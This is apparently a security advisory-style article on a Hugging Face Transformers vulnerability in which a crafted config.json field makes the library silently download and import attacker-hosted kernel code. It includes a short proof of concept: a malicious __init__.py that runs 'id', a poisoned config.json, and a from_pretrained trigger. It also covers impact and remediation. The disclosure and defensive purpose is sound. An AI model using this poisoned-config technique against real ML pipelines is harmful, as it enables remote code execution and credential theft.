CVE-2026-4372: Silent RCE in Hugging Face Transformers Bypasses trust_remote_code

A major security vulnerability has recently surfaced within the Hugging Face Transformers ecosystem, identified as CVE-2026-4372. This flaw represents a significant breakdown in the security boundary between model configuration data and executable code, exposing millions of machine learning workflows to silent Remote Code Execution (RCE).

The vulnerability was uncovered by Pluto Security researcher Yotam Perkal. The discovery is particularly alarming because it allows an attacker to hijack a victim’s system simply by tricking them into loading a poisoned model via the standard from_pretrained() API. Crucially, this exploit bypasses the industry-standard safety mechanism of trust_remote_code=True, requiring no explicit user consent to trigger the malicious payload.

Technical Analysis: How Configuration Becomes Code

The vulnerability impacts Transformers versions 4.56.0 through 5.2.x specifically when the optional kernels package is present. This insecure code path was introduced in August 2025 and remained active for nearly six months until the release of version 5.3.0 in March 2026.

Given the library’s massive scale—boasting over 2.2 billion installs and roughly 146 million monthly downloads—the exposure window created a profound supply chain risk for enterprise AI pipelines and research infrastructures.

At a technical level, the root cause is the unsafe deserialization of untrusted configuration data. When the library initializes a model, it parses the config.json file and dynamically maps its key-value pairs to the model object using Python’s setattr() function. This process fails to distinguish between legitimate hyperparameter data and sensitive internal attributes.

PyPI download telemetry showing massive scale of Hugging Face usage
PyPI download telemetry illustrating the vast attack surface (Source: Pluto Security)

One highly sensitive internal attribute is _attn_implementation_internal. This field is designed to dictate which attention kernel implementation the library should utilize. An attacker can inject this specific key into a config.json file, pointing it to a malicious repository following an "owner/repo" pattern.

The critical failure occurs when the library attempts to load this specified kernel. If the value matches the repository pattern, the library automatically downloads and imports the package. Because this import process lacks sandboxing, cryptographic signature verification, or user warnings, a mere configuration field is effectively upgraded to a code execution primitive.

The Attack Chain in Practice

In a typical exploitation scenario, a threat actor hosts a model on the Hugging Face Hub containing a modified config.json. When a developer runs a routine command like AutoModelForCausalLM.from_pretrained("attacker/model"), the library silently fetches the attacker’s kernel and executes it during the initialization phase.

Below is a technical Proof-of-Concept (PoC) demonstrating the mechanism:

1. The Malicious Kernel (hosted in the attacker’s repo):

# Malicious __init__.py
import os

def exploit():
    # Create a file to prove execution
    with open("/tmp/pwned.txt", "w") as f:
        f.write("System compromised\n")
    # Exfiltrate system identity
    os.system("id > /tmp/user_info.txt")

exploit()

2. The Poisoned config.json:

{
  "model_type": "llama",
  "_attn_implementation_internal": "attacker/malicious-kernel",
  "vocab_size": 32000
}

3. The Trigger:

from transformers import AutoModelForCausalLM

# This call triggers the silent execution of the malicious kernel
model = AutoModelForCausalLM.from_pretrained("attacker/malicious-model")

Impact and Ecosystem Implications

The consequences of successful exploitation are severe. Attackers can gain access to:

  • Sensitive Credentials: AWS keys, SSH private keys, and environment variables.
  • Persistence: Establishing backdoors within GPU-enabled cloud environments.
  • Lateral Movement: Using the compromised ML workstation to pivot into broader corporate CI/CD pipelines.

This vulnerability mirrors similar architectural failures in the ML ecosystem, such as the PyTorch weights_only bypass (CVE-2025-32434). These incidents highlight a recurring design flaw: many AI frameworks treat untrusted model artifacts as mere data, when they are, in reality, executable input.

Remediation and Best Practices

The issue is fully resolved in Transformers version 5.3.0. The patch implements a strict denylist for internal attributes and mandates that trust_remote_code=True be explicitly set for any external kernel loading.

Immediate Actions for Organizations:

  1. Update Immediately: Ensure all environments are running Transformers 5.3.0 or higher.
  2. Implement Sandboxing: Run model training and inference in isolated environments (e.g., Docker containers with limited privileges).
  3. Network Egress Control: Restrict outbound network access from ML workloads to prevent data exfiltration to unknown domains.
  4. Zero Trust for Models: Treat all models—even those from “trusted” sources—as potentially malicious code.

As machine learning becomes deeply integrated into the enterprise software stack, the security of the ML supply chain must be treated with the same rigor as traditional software dependencies.

Related Articles

Back to top button